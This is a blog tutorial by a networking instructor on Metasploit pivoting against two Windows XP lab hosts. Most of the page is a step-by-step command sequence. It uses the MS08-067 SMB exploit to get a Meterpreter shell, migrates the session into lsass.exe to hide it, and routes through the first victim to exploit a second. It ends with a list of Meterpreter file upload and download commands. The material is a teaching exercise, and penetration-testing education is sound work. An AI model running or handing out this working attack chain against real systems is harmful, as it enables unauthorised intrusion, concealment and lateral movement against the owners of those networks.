Metasploit Pivoting


Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.


In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then using pivoting, exploit another host on the network.

Requirements: The pentest exercise was conducted with the Backtrack5 VMware virtual machine against two hosts running WindowsXP Pro – Service Pack 2.

Exploit steps:

  1. Open a terminal in Backtrack and enter the following commands:
  2. #msfconsole
  3. msf > show exploits
  4. msf > use windows/smb/ms08_067_netapi
  5. msf exploit(ms08_067_netapi) > show payloads
  6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
  7. msf exploit (ms08_067_netapi) > show options
  8. msf exploit (ms08_067_netapi) > set RHOST <1st victim’s ip address>
    RHOST => <ip address>
  9. msf exploit (ms08_067_netapi) > exploit        //if you are successful, you will see a meterpreter prompt
  10. meterpreter >                    //if you see this you have a Meterpreter shell
  11. meterpreter > shell           //this will give you a Windows command prompt/shell
  12. C:\WINDOWS\sytem32> exit             //exit out of the Windows command prompt
  13. meterpreter > getpid                 //note the process id that Meterpreter is using
  14. meterpreter > ps              //list all running process on the victim machine. What process does your PID shows up as? svchost.exe? Look for the process “lsass.exe” , it may show up as PID 700
  15. meterpreter > migrate 700           //migrate Meterpreter to the lsass.exe process
  16. meterpreter > getpid                     //verify your new process ID
  17. ctrl+z                             //Key in ctrl+z to background the Meterpreter session
  18. msf > route add <2nd victim’s ip address> <subnet mask> <session id #>           //route a new attack to victim 2
  19. msf > use windows/smb/ms08_067_netapi
  20. msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  21. msf exploit (ms08_067_netapi) > set RHOST <2nd victim’s ip address>
  22. msf exploit (ms08_067_netapi) > exploit
  23. meterpreter >                           //success!!!!

Now that you have a meterpreter shell the sky is the limit. Run a help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:

meterpreter > help                     //help menu
meterpreter > background         //backgrounds the current session
meterpreter > exit                      //terminate the meterpreter session
meterpreter > quit                      //terminate the meterpreter session
meterpreter > write                    //writes data to a channel
meterpreter > mkdir                  //creates a directory
meterpreter > download            //download a file or directory
meterpreter > upload                //upload a file or directory
meterpreter > search                //search for a file

Video Tutorial

Author: Dan

Dan teaches computer networking and security classes at Central Oregon Community College.

Leave a Reply

Your email address will not be published.